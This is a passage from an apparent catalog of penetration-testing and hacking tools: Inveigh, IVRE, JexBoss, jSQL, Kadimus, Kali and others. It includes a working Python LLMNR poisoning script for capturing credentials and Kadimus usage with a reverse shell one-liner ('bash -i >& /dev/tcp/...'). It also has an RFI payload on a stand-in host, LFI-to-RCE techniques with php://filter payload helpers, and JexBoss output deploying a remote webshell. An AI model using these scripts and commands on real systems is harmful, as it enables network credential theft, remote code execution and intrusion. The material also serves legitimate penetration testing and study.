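        "qtype": qtype,
        "qclass": qclass,
        "question": packet[12:pos + 4],   # echoed verbatim in the response
    }


def build_llmnr_response(query: dict, spoof_ip: str, ttl: int = 30) -> bytes:
    """Build the poisoned answer: same transaction id, QR bit set, one A record."""
    if query["qtype"] != QTYPE_A or query["qclass"] != QCLASS_IN:
        raise ValueError("only A/IN queries are answered by this example")
    header = struct.pack("!HHHHHH", query["id"], 0x8000, 1, 1, 0, 0)
    answer = (
        encode_name(query["name"])                 # name repeated, uncompressed
        + struct.pack("!HHIH", QTYPE_A, QCLASS_IN, ttl, 4)
        + socket.inet_aton(spoof_ip)
    )
    return header + query["question"] + answer


# Constructed query (test data): a client looking up the mistyped host "fileserver"
SAMPLE_QUERY = (
    struct.pack("!HHHHHH", 0x1234, 0, 1, 0, 0, 0)
    + encode_name("fileserver")
    + struct.pack("!HH", QTYPE_A, QCLASS_IN)
)


def poison_loop(listen_ip: str, spoof_ip: str) -> None:
    """Answer every LLMNR A query seen on the wire with spoof_ip (hypothetical helper)."""
    sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM, socket.IPPROTO_UDP)
    sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    sock.bind(("", LLMNR_PORT))
    mreq = socket.inet_aton(LLMNR_GROUP) + socket.inet_aton(listen_ip)
    sock.setsockopt(socket.IPPROTO_IP, socket.IP_ADD_MEMBERSHIP, mreq)
    while True:
        data, src = sock.recvfrom(4096)
        try:
            query = parse_llmnr_query(data)
            sock.sendto(build_llmnr_response(query, spoof_ip), src)  # unicast back to the asker
            print(f"answered {query['name']} for {src[0]} with {spoof_ip}")
        except ValueError:
            continue


if __name__ == "__main__":
    q = parse_llmnr_query(SAMPLE_QUERY)
    print(q["name"], build_llmnr_response(q, "10.0.0.5").hex())
```

The response is sent unicast to the querier's source address and port, not back to the multicast group; once the victim connects to spoof_ip on SMB or HTTP, the challenge/response capture described in notes 3 and 4 takes over.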
Usage

Obtain an elevated administrator or SYSTEM shell. If


necessary, use a method to bypass script execution policy.
To execute with default settings:
Inveigh.ps1 -i localip

To execute with features enabled/disabled:


Inveigh.ps1 -i localip -LLMNR Y/N -NBNS Y/N -HTTP Y/N -HTTPS Y/N -SMB Y/N -Repeat Y/N -ForceWPADAuth Y/N

Download Inveigh
IP THIEF - SIMPLE IP STEALER IN PHP

A simple PHP script that captures the IP address of anyone who
opens the "imagen.php" file you send them. Options:

[+] It comes with an admin panel to view and delete IPs
[+] You can change the redirect URL / image
[+] You can see the visitor's country

Download IP Thief
IVRE - A PYTHON NETWORK RECON FRAMEWORK,
BASED ON NMAP, BRO & P0F

IVRE (Instrument de veille sur les réseaux extérieurs) or
DRUNK (Dynamic Recon of UNKnown networks) is a network
recon framework, including two modules for passive recon (one
p0f-based and one Bro-based) and one module for active recon
(mostly Nmap-based, with a bit of ZMap).
The advertising slogans are:

(in French): IVRE, il scanne Internet.


(in English): Know the networks, get DRUNK!
The names IVRE and DRUNK have been chosen as a tribute to
"Le Taullier".
External programs / dependencies

IVRE relies on:


Python 2, version 2.6 minimum
the Crypto module
the pymongo module, version 2.7.2 minimum.
Nmap & ZMap
Bro & p0f
MongoDB, version 2.6 minimum
a web server (successfully tested with Apache and Nginx,
should work with anything capable of serving static files
and run a Python-based CGI), although a test web server
is now distributed with IVRE (httpd-ivre)
a web browser (successfully tested with recent versions of
Firefox and Chromium)
Maxmind GeoIP free databases
optionally Tesseract, if you plan to add screenshots to
your Nmap scan results
optionally Docker & Vagrant (version 1.6 minimum)
IVRE comes with (refer to the LICENSE-EXTERNAL file for the
licenses):
AngularJS
Twitter Bootstrap
jQuery
D3.js
flag-icon-css

Passive recon
The following steps will show some examples of passive
network recon with IVRE. If you only want active (for example,

Nmap-based) recon, you can skip this part.


Using Bro

You need to run bro (2.3 minimum) with the option -b and the
location of the passiverecon.bro file. If you want to run it on
the eth0 interface, for example, run:
# mkdir logs
# bro -b /usr/local/share/ivre/passiverecon/passiverecon.bro -i eth0

If you want to run it on a capture file (capture needs to be a
PCAP file), run:
$ mkdir logs
$ bro -b /usr/local/share/ivre/passiverecon/passiverecon.bro -r capture

This will produce log files in the logs directory. You need to run
a passivereconworker to process these files. You can try:
$ passivereconworker --directory=logs

This program will not stop by itself. You can (p)kill it; it will
stop gracefully (as soon as it has finished processing the current
file).
Using p0f

To start filling your database with information from the eth0


interface, you just need to run (passiverecon is just a sensor
name here):
# p0f2db -s passiverecon iface:eth0

And from the same capture file:


$ p0f2db -s passiverecon capture

Using the results

You have two options for now:


the ipinfo command line tool

the db.passive object of the ivre.db Python module


For example, to show everything stored about an IP address or
a network:
$ ipinfo 1.2.3.4
$ ipinfo 1.2.3.0/24

See the output of ipinfo --help.


To use the Python module, run for example:
$ python
>>> from ivre.db import db
>>> db.passive.get(db.passive.flt_empty)[0]

For more, run help(db.passive) from the Python shell.

Active recon
Scanning

The easiest way is to install IVRE on the "scanning" machine


and run:
# runscans --routable --limit 1000 --output=XMLFork

This will run a standard scan against 1000 random hosts on the
Internet by running 30 nmap processes in parallel. See the
output of runscans --help if you want to do something else.
When it's over, to import the results in the database, run:
$ nmap2db -c ROUTABLE-CAMPAIGN-001 -s MySource -r scans/ROUTABLE/up

Here, ROUTABLE-CAMPAIGN-001 is a category (just an arbitrary


name that you will use later to filter scan results) and MySource
is a friendly name for your scanning machine (same here, an
arbitrary name usable to filter scan results; by default, when
you insert a scan result, if you already have a scan result for
the same host address with the same source, the previous
result is moved to an "archive" collection (fewer indexes) and
the new result is inserted in the database).
There is an alternative to installing IVRE on the scanning
machine that allows using several agents from one master.

See the AGENT file, the program runscans-agent for the


master and the agent/ directory in the source tree.
Using the results

You have three options:


the scancli command line tool
the db.nmap object of the ivre.db Python module
the web interface
CLI: scancli
To get all the hosts with the port 22 open:
$ scancli --port 22

See the output of scancli --help.


Python module
To use the Python module, run for example:
$ python
>>> from ivre.db import db
>>> db.nmap.get(db.nmap.flt_empty)[0]

For more, run help(db.nmap) from the Python shell.


Web interface
The interface is meant to be easy to use, it has its own
documentation.
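The records that nmap2db imports and that scancli and db.nmap filter come from Nmap's XML output. As an added example (not IVRE's code; IVRE's own importer handles far more of the format and stores into MongoDB), the following reads a constructed Nmap -oX document into per-host records and answers the same question as scancli --port 22, plus a product/version pivot of the kind IVRE indexes. The addresses and services in the sample are constructed test data.

```python
import xml.etree.ElementTree as ET

# Constructed Nmap -oX output (test data, documentation addresses), trimmed to the
# elements used below.
SAMPLE_NMAP_XML = """<nmaprun scanner="nmap" args="nmap -sV -oX - 203.0.113.0/30">
<host><status state="up"/><address addr="203.0.113.1" addrtype="ipv4"/>
<ports>
<port protocol="tcp" portid="22"><state state="open"/><service name="ssh" product="OpenSSH" version="6.7p1"/></port>
<port protocol="tcp" portid="80"><state state="open"/><service name="http" product="nginx"/></port>
</ports></host>
<host><status state="up"/><address addr="203.0.113.2" addrtype="ipv4"/>
<ports>
<port protocol="tcp" portid="22"><state state="filtered"/><service name="ssh"/></port>
<port protocol="tcp" portid="443"><state state="open"/><service name="https"/></port>
</ports></host>
<host><status state="down"/><address addr="203.0.113.3" addrtype="ipv4"/></host>
</nmaprun>"""


def parse_nmap_xml(text: str) -> list:
    """Turn Nmap XML into one record per host with its ports and services."""
    hosts = []
    for host in ET.fromstring(text).findall("host"):
        status = host.find("status")
        addr = host.find("address[@addrtype='ipv4']")
        if status is None or addr is None:
            continue
        record = {"addr": addr.get("addr"), "state": status.get("state"), "ports": []}
        for port in host.findall("ports/port"):
            state = port.find("state")
            service = port.find("service")
            record["ports"].append({
                "port": int(port.get("portid")),
                "protocol": port.get("protocol"),
                "state": state.get("state") if state is not None else None,
                "service": service.get("name") if service is not None else None,
                "product": service.get("product") if service is not None else None,
                "version": service.get("version") if service is not None else None,
            })
        hosts.append(record)
    return hosts


def hosts_with_open_port(hosts: list, port: int, protocol: str = "tcp") -> list:
    """The scancli --port 22 question: which hosts have this port open (not filtered)?"""
    return [
        h["addr"] for h in hosts
        if any(p["port"] == port and p["protocol"] == protocol and p["state"] == "open"
               for p in h["ports"])
    ]


def product_index(hosts: list) -> dict:
    """Pivot by service product/version, the kind of index IVRE builds for filtering."""
    index = {}
    for h in hosts:
        for p in h["ports"]:
            if p["product"]:
                key = (p["product"], p["version"])
                index.setdefault(key, []).append((h["addr"], p["port"]))
    return index


if __name__ == "__main__":
    records = parse_nmap_xml(SAMPLE_NMAP_XML)
    print("port 22 open on:", hosts_with_open_port(records, 22))
    print(product_index(records))
```

Note that 203.0.113.2 is excluded from the port-22 result even though it has a port 22 element: the state is "filtered", and a scan database that conflates filtered with open produces misleading pivots.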

Download IVRE
JADX - JAVA SOURCE CODE FROM ANDROID DEX AND
APK FILES

Command line and GUI tools for produce Java source code
from Android Dex and Apk files.
Usage
jadx[-gui] [options] <input file> (.dex, .apk, .jar or .class)
options:
-d, --output-dir     - output directory
-j, --threads-count  - processing threads count
-f, --fallback       - make simple dump (using goto instead of 'if', 'for', etc)
--cfg                - save methods control flow graph to dot file
--raw-cfg            - save methods control flow graph (use raw instructions)
-v, --verbose        - verbose output
-h, --help           - print this help

Example:
jadx -d out classes.dex

Download JADX
JAVA LOIC - LOW ORBIT ION CANNON. A JAVA BASED
NETWORK STRESS TESTING APPLICATION

Low Orbit Ion Cannon. The project is a Java implementation of


LOIC written by Praetox but it's not related with the original
project. The main purpose of Java LOIC is testing your
network.
Java LOIC should work on most operating systems.

Download Java LOIC
JEXBOSS - JBOSS VERIFY AND EXPLOITATION TOOL
JexBoss is a tool for testing and exploiting vulnerabilities in
JBoss Application Server.

REQUIREMENTS

Python <= 2.7.x

INSTALLATION
To install the latest version of JexBoss, please use the
following commands:
git clone https://github.com/joaomatosf/jexboss.git
cd jexboss
python jexboss.py

FEATURES
The tool and exploits were developed and tested for versions 3,
4, 5 and 6 of the JBoss Application Server.
The exploitation vectors are:
/jmx-console
tested and working in JBoss versions 4, 5 and 6
/web-console/Invoker
tested and working in JBoss versions 4
/invoker/JMXInvokerServlet
tested and working in JBoss versions 4 and 5

USAGE EXAMPLE

Check the file "demo.png"

$ git clone https://github.com/joaomatosf/jexboss.git


$ cd jexboss
$ python jexboss.py https://site-teste.com
* --- JexBoss: Jboss verify and EXploitation Tool --- *
|                                                     |
| @author:  João Filho Matos Figueiredo               |
| @contact: joaomatosf@gmail.com                      |
| @update:  https://github.com/joaomatosf/jexboss     |
#_____________________________________________________#

** Checking Host: https://site-teste.com **

* Checking web-console:         [ OK ]
* Checking jmx-console:         [ VULNERABLE ]
* Checking JMXInvokerServlet:   [ VULNERABLE ]

* Do you want to try to run an automated exploitation via "jmx-console" ?
This operation will provide a simple command shell to execute commands on the server..
Continue only if you have permission!
yes/NO ? yes
* Sending exploit code to https://site-teste.com. Wait...

* Info: This exploit will force the server to deploy the webshell
available on: http://www.joaomatosf.com/rnp/jbossass.war
* Successfully deployed code! Starting command shell, wait...
* - - - - - - - - - - - - - - - - - - - - LOL - - - - - - - - - - - - - - - - - - - *
* https://site-teste.com:
Linux fwgw 2.6.32-431.29.2.el6.x86_64 #1 SMP Tue Sep 9 21:36:05 UTC 2014 x86_64 x86_64 x86_64 GNU/Linux
CentOS release 6.5 (Final)
uid=509(jboss) gid=509(jboss) grupos=509(jboss) context=system_u:system_r:initrc_t:s0
[Type commands or "exit" to finish]
Shell> pwd
/usr/jboss-6.1.0.Final/bin
[Type commands or "exit" to finish]
Shell> hostname
fwgw
[Type commands or "exit" to finish]
Shell> ls -all /tmp
total 35436
drwxrwxrwt.  4 root root     4096 Nov 24 16:36 .
dr-xr-xr-x. 22 root root     4096 Nov 23 03:26 ..
-rw-r--r--.  1 root root 34630995 Out 15 18:07 snortrules-snapshot-2962.tar.gz
-rw-r--r--.  1 root root       32 Out 16 14:51 snortrules-snapshot-2962.tar.gz.md5
-rw-------.  1 root root        0 Set 20 16:45 yum.log
-rw-------.  1 root root     2743 Set 20 17:18 yum_save_tx-2014-09-20-17-18nQiKVo.yumtx
-rw-------.  1 root root     1014 Out  6 00:33 yum_save_tx-2014-10-06-00-33vig5iT.yumtx
-rw-------.  1 root root      543 Out  6 02:14 yum_save_tx-2014-10-06-02-143CcA5k.yumtx
-rw-------.  1 root root    18568 Out 14 03:04 yum_save_tx-2014-10-14-03-04Q9ywQt.yumtx
-rw-------.  1 root root      315 Out 15 16:00 yum_save_tx-2014-10-15-16-004hKzCF.yumtx
[Type commands or "exit" to finish]
Shell>

Download JexBoss
JOHNNY - GUI FOR JOHN THE RIPPER

Johnny is a cross-platform open-source GUI for the popular


password cracker John the Ripper.
Features

1. user could start, pause and resume attack (though only


one session is allowed globally),
2. all attack related options work,
3. all input file formats are supported (pure hashes, pwdump,
passwd, mixed),
4. ability to resume any previously started session via
session history,

5. suggest the format of each hashes,


6. try lucky guesses with password guessing feature,
7. smart default options,
8. accurate output of cracked passwords,
9. config is stored in .conf file (~/.john/johnny.conf),
10. nice error messages and other user friendly things,
11. export of cracked passwords through the clipboard,
12. export works with office suites (tested with LibreOffice
Calc),
13. available in English and French,
14. allows you to set environment variables for each session
directly in Johnny

Download Johnny
JOOMLAVS - A BLACK BOX, JOOMLA VULNERABILITY
SCANNER

JoomlaVS is a Ruby application that can help automate
assessing how vulnerable a Joomla installation is to
exploitation. It supports basic fingerprinting and can scan for
vulnerabilities in components, modules and templates as well
as vulnerabilities that exist within Joomla itself.
How to install

JoomlaVS has so far only been tested on Debian, but the


installation process should be similar across most operating
systems.
1. Ensure Ruby [2.0 or above] is installed on your system
2. Clone the source code using git clone https://
github.com/rastating/joomlavs.git

3. Install bundler and required gems using sudo gem


install bundler && bundle install
How to use

The only required option is the -u / --url option, which


specifies the address to target. To do a full scan, however, the
--scan-all option should also be specified, e.g. ruby
joomlavs.rb -u yourjoomlatarget.com --scan-all .
A full list of options can be found below:

usage: joomlavs.rb [options]

Basic options
-u, --url               The Joomla URL/domain to scan.
--basic-auth            <username:password> The basic HTTP authentication credentials
-v, --verbose           Enable verbose mode

Enumeration options
-a, --scan-all          Scan for all vulnerable extensions
-c, --scan-components   Scan for vulnerable components
-m, --scan-modules      Scan for vulnerable modules
-t, --scan-templates    Scan for vulnerable templates
-q, --quiet             Scan using only passive methods

Advanced options
--follow-redirection    Automatically follow redirections
--no-colour             Disable colours in output
--proxy                 <[protocol://]host:port> HTTP, SOCKS4, SOCKS4A and SOCKS5 are supported. If no protocol is given, HTTP will be used
--proxy-auth            <username:password> The proxy authentication credentials
--threads               The number of threads to use when multi-threading requests
--user-agent            The user agent string to send with all requests

Download Joomlavs
JSQL INJECTION V0.73 - JAVA TOOL FOR AUTOMATIC
SQL DATABASE INJECTION

jSQL Injection is a lightweight application used to find


database information from a distant server.
jSQL is free, open source and cross-platform (Windows,
Linux, Mac OS X, Solaris).
jSQL is part of Kali Linux, the official successor of the BackTrack
penetration testing distribution.
jSQL is also included in Black Hat Sec, ArchAssault Project,
BlackArch Linux and Cyborg Hawk Linux.

CHANGE LOG
Coming... i18n arabic russian chinese integration,
next db engines: SQLite Access MSDE...
v0.73 Authentication Basic Digest Negotiate NTLM and
Kerberos, database type selection
v0.7 Batch scan, Github issue reporter, support for 16
db engines, optimized GUI
alpha-v0.6 Speed x 2 (no more hex encoding), 10 db
vendors supported: MySQL Oracle SQLServer PostgreSQL
DB2 Firebird Informix Ingres MaxDb Sybase. JUnit
tests, log4j, i18n integration and more.
0.5 SQL shell, Uploader.
0.4 Admin page search, Brute force (md5 mysql...),
Decoder (decode encode base64 hex md5...).
0.3 Distant file reader, Webshell drop, Terminal for
webshell commands, Configuration backup, Update
checker.
0.2 Time based algorithm, Multi-thread control (start
pause resume stop), Shows URL calls.

Download jSQL Injection v0.73


JUST-METADATA - TOOL THAT GATHERS AND
ANALYZES METADATA ABOUT IP ADDRESSES

Just-Metadata is a tool that can be used to gather intelligence


information passively about a large number of IP addresses,
and attempt to extrapolate relationships that might not
otherwise be seen. Just-Metadata has "gather" modules which
are used to gather metadata about IPs loaded into the
framework across multiple resources on the internet. Just-Metadata also has "analysis" modules. These are used to
analyze the data loaded into Just-Metadata and perform various
operations that can identify potential relationships between the
loaded systems.
Just-Metadata will allow you to quickly find the Top "X" number
of states, cities, timezones, etc. that the loaded IP addresses
are located in. It will allow you to search for IP addresses by
country. You can search all IPs to find which ones are used in
callbacks as identified by VirusTotal. Want to see if any IPs
loaded have been documented as taking part of attacks via the
Animus Project, Just-Metadata can do it.
Additionally, it is easy to create new analysis modules to let
people find other relationships between the loaded IPs based on
the available data. New intel gathering modules can be added
just as easily!
Setup

Ideally, you should be able to run the setup script, and it will
install everything you need.
For the Shodan information gathering module, YOU WILL
NEED a Shodan API key. This costs like $9 bucks, come on
now, it's worth it :).
Usage

As of now, Just-Metadata is designed to read in a single text file
containing IPs, each on its own line. Create this file from
any source (C2 callback IPs, web server logs, etc.). Once you
have this file, start Just-Metadata by calling it:
./Just-Metadata.py
Commands

help - Once in the framework, to see a listing of available


commands and a description of what they do, type the "help"
command.
load <filename> - The load command takes an extra
parameter, the file name that you (the user) want Just-Metadata to load IP addresses from. This command will open
the file and load all IPs within it into the framework.
Ex: load ipaddresses.txt
save - The save command can be used to save the current
working state of Just-Metadata. This is helpful in multiple
cases, such as after gathering information about IPs, when you
want to save the state to disk to be able to work on them
at a later point in time. Simply typing "save" will result in Just-Metadata saving the state to disk and displaying the filename
of the saved state.
import <statefile> - The import command can be used to load
a previously saved Just-Metadata state into the framework. It
will load all IPs that were saved, and all information gathered
about the IP addresses. This command requires an extra
parameter, the name of the state file that you want Just-Metadata to load.
Ex: import goodfile.state
list <module type> - The list command can be used to list the
different types of modules loaded into Just-Metadata. This
command takes an extra parameter, either "analysis" or
"gather". Just-Metadata will display all modules of the type that
the user requests.
Ex: list analysis
Ex: list gather
gather <gather module name> - The gather command tells
Just-Metadata to run the module specified and gather
information from that source. This can be used to gather
geographical information, Virustotal, whois, and more. It's all
based on the module. The data gathered will be stored within
the framework in memory and can also be saved to disk with
the "save" command.
Ex: gather geoinfo
Ex: gather virustotal
analyze <analysis module name> - The analyze command
tells Just-Metadata to run an analysis module against the data
loaded into the framework. These modules can be used to find
IP addresses that share the same SSH keys or SSL Public Key
certificates, or certificate chains. They can also be used to find
IP addresses used in the same callbacks by malicious
executables.

ip_info <IP Address> - This command is used to dump all


information about a specific IP address. This is currently being
used after having run analysis modules. For example, after
identifying IP addresses that share the same SSH keys, I can
dump all information about those IPs. I will see if they have
been used by malware, where they are located, etc.
export - The export command will have Just-Metadata dump all
information that's been gathered about all IP addresses
currently loaded into the framework to CSV.
Read more here.

Download Just-Metadata
KADIMUS - LFI SCAN & EXPLOIT TOOL

Kadimus is a tool to check sites for LFI vulnerabilities, and also
to exploit them.
Features:

Check all url parameters


/var/log/auth.log RCE
/proc/self/environ RCE
php://input RCE
data://text RCE
Source code disclosure
Multi thread scanner

Command shell interface through HTTP Request


Proxy support (socks4://, socks4a://, socks5:// ,socks5h://
and http://)

Compile:

Installing libcurl:
CentOS/Fedora
# yum install libcurl-devel

Debian based

# apt-get install libcurl4-openssl-dev

Installing libpcre:

CentOS/Fedora

# yum install libpcre-devel

Debian based

# apt-get install libpcre3-dev

Installing libssh:
CentOS/Fedora
# yum install libssh-devel

Debian based

# apt-get install libssh-dev

And finally:
$ git clone https://github.com/P0cL4bs/Kadimus.git
$ cd Kadimus
$ make

Options:
-h, --help                  Display this help menu

Request:
-B, --cookie STRING         Set custom HTTP Cookie header
-A, --user-agent STRING     User-Agent to send to server
--connect-timeout SECONDS   Maximum time allowed for connection
--retry-times NUMBER        Number of times to retry if connection fails
--proxy STRING              Proxy to connect, syntax: protocol://hostname:port

Scanner:
-u, --url STRING            Single URI to scan
-U, --url-list FILE         File containing URIs to scan
-o, --output FILE           File to save output results
--threads NUMBER            Number of threads (2..1000)

Exploitation:
-t, --target STRING         Vulnerable target to exploit
--inject-at STRING          Parameter name to inject exploit (only needed with RCE data and source disclosure)

RCE:
-X, --rce-technique=TECH    LFI to RCE technique to use
-C, --code STRING           Custom PHP code to execute, with php brackets
-c, --cmd STRING            Execute system command on vulnerable target system
-s, --shell                 Simple command shell interface through HTTP request
-r, --reverse-shell         Try to spawn a reverse shell connection
-l, --listen NUMBER         Port to listen on
-b, --bind-shell            Try to connect to a bind shell
-i, --connect-to STRING     IP/hostname to connect to
-p, --port NUMBER           Port number to connect to
--ssh-port NUMBER           Set the SSH port to try to inject the command (default: 22)
--ssh-target STRING         Set the SSH host

RCE available techniques:
environ                     Try to run PHP code using /proc/self/environ
input                       Try to run PHP code using php://input
auth                        Try to run PHP code using /var/log/auth.log
data                        Try to run PHP code using data://text

Source Disclosure:
-G, --get-source            Try to get the source files using filter://
-f, --filename STRING       Set filename to grab source [REQUIRED]
-O FILE                     Set output file (default: stdout)

Examples:

Scanning:
./kadimus -u localhost/?pg=contact -A my_user_agent
./kadimus -U url_list.txt --threads 10 --connect-timeout 10 --retry-times 0

Get source code of file:
./kadimus -t localhost/?pg=contact -G -f "index.php" -O local_output.php --inject-at pg

Execute php code:
./kadimus -t localhost/?pg=php://input -C '<?php echo "pwned"; ?>' -X input

Execute command:
./kadimus -t localhost/?pg=/var/log/auth.log -X auth -c 'ls -lah' --ssh-target localhost

Checking for RFI:
You can also check for RFI: put the remote URL in
resource/common_files.txt together with the regex that identifies it,
example:
/* http://bad-url.com/shell.txt */ <?php echo base64_decode("c2NvcnBpb24gc2F5IGdldCBvdmVyIGhlcmU="); ?>
in file:
http://bad-url.com/shell.txt?:scorpion say get over here

Reverse shell:
./kadimus -t localhost/?pg=contact.php -Xdata --inject-at pg -r -l 12345 -c 'bash -i >& /dev/tcp/127.0.0.1/12345 0>&1' --retry-times 0
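The source-disclosure (-G) and RFI checks above rest on two small pieces of logic: build the request with the wrapper in the vulnerable parameter, then recognise what came back. The following added example (not Kadimus's code, which is C) shows both, with the php://filter payload that returns a file base64-encoded instead of executing it, a decoder for the response, and a classifier for the usual LFI/RFI indicators including the marker string from the RFI example above. The vulnerable page source, the URL and the sample response are constructed test data; a real target's page wraps the blob in more markup, which is why the decoder looks for the longest base64 run rather than assuming the body is only the blob.

```python
import base64
import re
from urllib.parse import parse_qsl, urlencode, urlsplit, urlunsplit

# Marker the RFI check above looks for: base64_decode("c2NvcnBpb24gc2F5IGdldCBvdmVyIGhlcmU=")
RFI_MARKER = "scorpion say get over here"


def inject_param(url: str, param: str, payload: str) -> str:
    """Replace (or add) one query parameter, leaving the others untouched."""
    parts = urlsplit(url)
    query = [(k, v) for k, v in parse_qsl(parts.query, keep_blank_values=True) if k != param]
    query.append((param, payload))
    return urlunsplit(parts._replace(query=urlencode(query, safe="/:=")))


def filter_payload(filename: str) -> str:
    """php://filter wrapper that returns the file base64-encoded instead of executing it."""
    return "php://filter/convert.base64-encode/resource=" + filename


def extract_filter_source(body: str):
    """Recover the source from a php://filter response: longest base64 run in the page."""
    runs = re.findall(r"[A-Za-z0-9+/]{16,}={0,2}", body)
    if not runs:
        return None
    try:
        return base64.b64decode(max(runs, key=len), validate=True).decode("utf-8", "replace")
    except ValueError:          # binascii.Error is a ValueError subclass
        return None


def classify_response(body: str):
    """Classify a test response the way an LFI/RFI scanner does."""
    if re.search(r"root:[^:]*:0:0:", body):
        return "passwd"               # traversal reached /etc/passwd
    if RFI_MARKER in body:
        return "rfi-marker"           # our remote file was included and executed
    if re.search(r"(Warning|Fatal error): (include|require)(_once)?\(", body):
        return "include-error"        # the parameter reaches include(): worth exploiting further
    return None


# Constructed data (test only): the vulnerable page source and a page that echoes
# the filtered, base64-encoded copy of it back, as a real target would.
VULNERABLE_SOURCE = "<?php\n$page = $_GET['pg'];\ninclude($page . '.php');\n"
SAMPLE_FILTER_RESPONSE = (
    "<html><body>" + base64.b64encode(VULNERABLE_SOURCE.encode()).decode() + "</body></html>"
)


if __name__ == "__main__":
    # With include($page . '.php') the suffix is appended by the server, so request
    # "index", not "index.php" (the same reasoning applies to the -f value given to Kadimus).
    print(inject_param("http://localhost/?pg=contact", "pg", filter_payload("index")))
    print(extract_filter_source(SAMPLE_FILTER_RESPONSE))
    print(classify_response("Warning: include(../../../../etc/passwd.php): failed to open stream"))
```

The include-error class is the one that turns a blind check into a confirmed finding: the PHP warning echoes the exact path the server tried to open, which tells you whether a prefix or suffix is being appended before you pick one of the RCE techniques listed above.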

Download Kadimus
KALI LINUX 1.1.0 - THE BEST PENETRATION TESTING
DISTRIBUTION

After almost two years of public development (and another year
behind the scenes), we are proud to announce our first point
release of Kali Linux, version 1.1.0. This release brings with
it a mix of unprecedented hardware support as well as rock
solid stability. For us, this is a real milestone, as this
release epitomizes the benefits of our move from BackTrack to
Kali Linux over two years ago. As we look at a now mature Kali,
we see a versatile, flexible Linux distribution, rich with useful
security and penetration testing related features, running on all
sorts of weird and wonderful ARM hardware. But enough talk,
here are the goods:
The new release runs a 3.18 kernel, patched for wireless
injection attacks.
Our ISO build systems are now running off live-build 4.x.
Improved wireless driver support, due to both kernel and
firmware upgrades.
NVIDIA Optimus hardware support.
Updated virtualbox-tool, openvm-tools and vmware-tools
packages and instructions.
A whole bunch of fixes and updates from our bug-tracker
changelog.
And most importantly, we changed grub screens and
wallpapers!
Upgrade Kali Linux 1.1.0

If you've already got Kali Linux installed and running, there's no
need to re-download the image as you can simply update your
existing operating system using simple apt commands:
apt-get update
apt-get dist-upgrade

Download Kali Linux 1.1.0


KALI LINUX 2.0 - THE BEST PENETRATION TESTING

DISTRIBUTION

So, what's new in Kali 2.0? There's a new 4.0 kernel, now
based on Debian Jessie, improved hardware and wireless
driver coverage, support for a variety of desktop environments
(GNOME, KDE, Xfce, MATE, e17, LXDE, i3wm), updated desktop
environment and tools, and the list goes on.
Kali Linux is Now a Rolling Distribution

One of the biggest moves we've taken to keep Kali 2.0 up to date in a global, continuous manner is transforming Kali into
a rolling distribution. What this means is that we are pulling
our packages continuously from Debian Testing
(after making sure that all packages are installable),
essentially upgrading the Kali core system, while allowing us to
take advantage of newer Debian packages as they roll out. This
move is where our choice of Debian as a base system really
pays off: we get to enjoy the stability of Debian, while still
remaining on the cutting edge.

Continuously Updated Tools, Enhanced Workflow

Another interesting development in our infrastructure has been
the integration of an upstream version checking system,
which alerts us when new upstream versions of tools are
released (usually via git tagging). This script runs daily on a
select list of common tools and keeps us alerted if a new tool
requires updating. With this new system in place, core tool
updates will happen more frequently. With the introduction of
this new monitoring system, we will slowly start phasing out the
tool upgrades option in our bug tracker.
New Flavours of Kali Linux 2.0

Through our Live Build process, Kali 2.0 now natively supports
KDE, GNOME3, Xfce, MATE, e17, lxde and i3wm. We've
moved on to GNOME 3 in this release, marking the end of a
long abstinence period. We've finally embraced GNOME 3 and
with a few custom changes, it's grown to be our favourite
desktop environment. We've added custom support for multi-level menus, true terminal transparency, as well as a handful of
useful gnome shell extensions. This however has come at a
price: the minimum RAM requirement for a full GNOME 3
session has increased to 768 MB. This is a non-issue on
modern hardware but can be detrimental on lower-end
machines. For this reason, we have also released an official,
minimal Kali 2.0 ISO. This light flavour of Kali includes a
handful of useful tools together with the lightweight Xfce
desktop environment, a perfect solution for resource-constrained computers.
Kali Linux 2.0 ARM Images & NetHunter 2.0

The whole ARM image section has been updated across the
board with Kali 2.0, including Raspberry Pi, Chromebooks,
Odroids, the whole lot! In the process, we've added some
new images such as the latest Chromebook Flip. Another
helpful change we've implemented in our
ARM images is including kernel sources, for easier compilation
of new drivers.
We haven't forgotten about NetHunter, our favourite mobile
penetration testing platform, which also got an update and
now includes Kali 2.0. With this, we've released a whole
barrage of new NetHunter images for Nexus 5, 6, 7, 9, and 10.
The OnePlus One NetHunter image has also been updated to
Kali 2.0 and now has a much awaited image for CM12 as well;
check the Offensive Security NetHunter page for more
information.
Updated VMware and VirtualBox Images

Offensive Security, the information security training and
penetration testing company behind Kali Linux, has put up
new VMware and VirtualBox Kali 2.0 images for those who want
to try Kali in a virtual environment. These include 32 and 64 bit
flavours of the GNOME 3 full Kali environment.
If you want to build your own virtual environment, you can
consult our documentation site on how to install the various
virtual guest tools for a smoother experience.
How Do I Upgrade to Kali 2.0?

Yes, you can upgrade Kali 1.x to Kali 2.0! To do this, you will
need to edit your sources.list entries, and run a dist-upgrade as
shown below. If you have been using incorrect or extraneous
Kali repositories or otherwise manually installed or overwritten
Kali packages outside of apt, your upgrade to Kali 2.0 may
fail. This includes scripts like lazykali.sh, PTF, manual git
clones in incorrect directories, etc. All of these will clobber
existing files on the filesystem and result in a failed upgrade. If
this is the case for you, you're better off reinstalling your OS
from scratch.
Otherwise, feel free to:
cat << EOF > /etc/apt/sources.list
deb http://http.kali.org/kali sana main non-free contrib
deb http://security.kali.org/kali-security/ sana/updates
main contrib non-free
EOF
apt-get update
apt-get dist-upgrade # get a coffee, or 10.
reboot

Download Kali Linux 2.0


KALI LINUX NETHUNTER - ANDROID PENETRATION
TESTING PLATFORM

NetHunter is an Android penetration testing platform for Nexus
and OnePlus devices built on top of Kali Linux, which includes
some special and unique features. Of course, you have all the
usual Kali tools in NetHunter as well as the ability to get a full
VNC session from your phone to a graphical Kali chroot;
however, the strength of NetHunter does not end there.
We've incorporated some amazing features into the NetHunter
OS which are both powerful and unique. From pre-programmed
HID Keyboard (Teensy) attacks, to BadUSB Man In The Middle
attacks, to one-click MANA Evil Access Point setups. And yes,
NetHunter natively supports wireless 802.11 frame injection
with a variety of supported USB NICs. NetHunter is still in its
infancy and we are looking forward to seeing this project and
community grow.

[Video: Kali Linux NetHunter HID Attack, from Offensive Security]
Supported Devices

The Kali NetHunter image is currently compatible with the


following Nexus and OnePlus devices:
Nexus 4 (GSM) - mako
Nexus 5 (GSM/LTE) - hammerhead
Nexus 7 [2012] (Wi-Fi) - nakasi
